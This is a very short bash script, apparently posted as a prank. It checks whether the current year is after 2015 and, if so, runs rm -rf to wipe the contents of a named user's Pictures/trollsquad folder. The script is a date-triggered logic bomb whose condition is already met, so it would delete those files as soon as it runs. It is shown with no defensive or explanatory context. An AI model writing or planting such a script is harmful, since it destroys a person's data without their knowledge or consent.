Code:
#!/bin/bash

if [ `date +%Y` -gt 2015 ];
        then
        rm -rf /home/rubycalaber/Pictures/trollsquad/*
fi